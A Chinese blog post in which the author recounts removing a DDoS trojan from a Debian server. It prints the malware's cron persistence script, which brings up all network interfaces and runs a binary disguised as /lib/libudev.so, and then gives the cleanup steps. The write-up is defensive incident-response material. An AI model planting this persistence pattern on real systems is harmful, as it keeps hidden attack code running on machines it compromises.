主页 > 工作 > Debian下木马清除记录

Debian下木马清除记录

 

朋友给我电话,说一台虚拟服务器不停的发包,把内网给网络给占满了。于是上去分析了下,很巧,和公司之前一台阿里云机器中的木马一模一样,进行DDOS攻击。

首先把IP给放入IPTABLES里面DROP掉再说,然后熟悉的节奏抓出源文件干掉,详细可以参照这篇文章:http://www.tuicool.com/articles/vA3QRrn

直接去/etc/cron.hourly/里面找到一个gcc.sh的脚本,然后在/etc/contab里面每3分钟执行一次这个脚本,脚本内容如下:

root@server02:~# cat gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {‘print $1’}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

功能就是不断的启动所有网卡,然后执行libudev.so这个文件。果断删除这个文件…

咦,删掉又出来了?没关系,rm –fr libudev.so*;touch libudev.so;chattr +i libudev.so 这下总没辙了把!再杀掉对应进程观察了下,果然没有新的进程起来了,然后网络也恢复了正常。

安全一点再find一把,把相应文件给全部干掉。然后再把服务器密码给改了,因为一问朋友,果然用来弱口令…

原创文章,转载请注明: 转载自三叶草

本文链接地址:http://www.anjing.me/1524.html

特别声明:商业网站转载需经作者同意,否则视为侵权!

, ,

评论:3

参与评论
  1. 回复 phenix3443 16/08/29

    你好久没有更新博客了啊,干嘛去了

遇见台儿庄进行回复 取消回复

电子邮件地址不会被公开。

*

引用:0

下面所列的是引用到本博客的链接
Debian下木马清除记录 来自 三叶草
顶部